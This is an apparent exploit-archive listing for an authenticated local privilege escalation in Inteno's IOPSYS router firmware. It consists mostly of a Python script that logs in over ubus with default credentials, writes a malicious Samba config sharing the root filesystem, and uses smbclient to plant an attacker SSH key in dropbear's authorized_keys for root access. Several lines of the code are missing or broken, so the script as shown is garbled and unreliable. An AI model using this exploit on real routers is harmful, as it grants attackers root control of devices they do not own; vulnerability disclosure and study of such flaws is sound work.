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Inteno's IOPSYS Local Privilege Escalation

Inteno's IOPSYS Local Privilege Escalation
Posted Jul 25, 2018
Authored by neonsea

Inteno's IOPSYS suffers from an authenticated local privilege escalation vulnerability.

tags | exploit, local
SHA-256 | b9177eea9da8a509b704df3b4cf75bdc9608620f7338ca46161c5e96519ca5c8

Inteno's IOPSYS Local Privilege Escalation

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import json
import sys
import subprocess
import socket
import os
from websocket import create_connection

def ubusAuth(host, username, password):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
{"username": username,"password":password}],
response = json.loads(ws.recv())
key = response.get('result')[1].get('ubus_rpc_session')
except IndexError:

def ubusCall(host, key, namespace, argument, params={}):
ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call",
response = json.loads(ws.recv())
result = response.get('result')[1]
except IndexError:
if response.get('result')[0] == 0:

if __name__ == "__main__":
host = ""
sshkey = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ=="
user = "user"
pasw = "user"
conf = """[global]
netbios name = IntenoSMB
workgroup = IntenoSMB
server string = IntenoSMB
syslog = 10
encrypt passwords = true
passdb backend = smbpasswd
obey pam restrictions = yes
socket options = TCP_NODELAY
unix charset = UTF-8
preferred master = yes
os level = 20
security = user
guest account = root
smb passwd file = /etc/samba/smbpasswd
interfaces = br-lan
bind interfaces only = yes
wide links = no

path = /
read only = no
guest ok = yes
create mask = 0700
directory mask = 0700
force user = root

key = ubusAuth(host, user, pasw)
if (not key):
print("Auth failed!")
print("Got key: %s" % key)

print("Dropping evil Samba config...")
ltc = ubusCall(host, key, "file", "write_tmp",
{"path":"/tmp/etc/smb.conf", "data": conf})
if (not ltc):
print("Failed to write evil config!")

print("Creating temp file for key...")
with open(".key.tmp","a+") as file:
path = os.path.realpath(file.name)

print("Dropping key...")
subprocess.run("smbclient {0}pwn -U% -c 'put {1} /etc/dropbear/authorized_keys'".format(r"\\\\" + host + r"\\", path),
shell=True, check=True)
print("Key dropped")

print("Cleaning up...")

print("Exploitation complete. Try \"ssh root@%s\"" % host)

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